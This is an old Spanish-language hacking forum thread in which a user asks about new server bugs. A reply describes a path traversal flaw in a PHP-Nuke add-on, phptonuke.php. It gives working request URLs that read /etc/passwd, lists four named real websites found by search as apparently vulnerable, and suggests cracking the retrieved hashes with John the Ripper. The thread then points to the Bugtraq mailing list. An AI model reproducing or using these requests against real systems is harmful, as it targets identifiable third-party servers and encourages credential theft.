tengo una duda...
yo leo todo lo k pillo sobre el tema de los bugs en servidores..., pero la verdad, es k desde el bug del unicode no ha salio na nuevo....
me gustaria saber si hay algun nuevo bug...
un saludo a todos!!!!
20-11-2002, 18:16
tengo una duda...
yo leo todo lo k pillo sobre el tema de los bugs en servidores..., pero la verdad, es k desde el bug del unicode no ha salio na nuevo....
me gustaria saber si hay algun nuevo bug...
un saludo a todos!!!!
Mira este para los php-nuke:
-----------------
Salio el advisory en la bugtraq, basicamente..... es un php con la capacidad de 'encuadernar' un archivo, dentro de un diseño predefinido.
http://site.ar/phptonuke.php?filnavn=/docs.html
Ahora.... que pasa si en vez de llamar a 'docs.html' llamamos a...
http://site.ar/phptonuke.php?filnavn=/etc/passwd ???
En 4 encontre estos sites via google ( "phptonuke.php" )....
http://www.goodgame.org/phptonuke.php?filnavn=/etc/passwd
http://ns.csb.cz/slavistickenoviny/phptonuke.php?filnavn=/etc/passwd
http://www.slavistickenoviny.cz/phptonuke.php?filnavn=/etc/passwd
http://www.agrexive.de/phptonuke.php?filnavn=/etc/passwd
Por mas q los pass esten shadow, la idea es testear y darnos cuenta de las cosas q se pueden aprovechar.......
Solo pasarlos a un txt, john y.... lo demas es cosa vuetra...
-----------------------
De esta vulnerabilidad me entere por Bladec, posteriormente la busque y encontre este post de Cyervo que la explicaba
No se cuantos sitios pueden tener este bug pues no se a que php-nuke pertenece y si las nuevas versiones traen este bug.
Cuestion de probar.
y referente a que no hay mas bugs...... xDDDDD
Apuntate a la lista del Bugtraq y veras...
ostia k majo, me podrias decir k tengo k hacer para apuntarme a la lista del bugtraq, k n se ni lo k es...graicas por todo
securityfocus.org
Yo estoy suscrito a todas las listas y de vez en cuando participo en ellas.
TseTse
Marcadores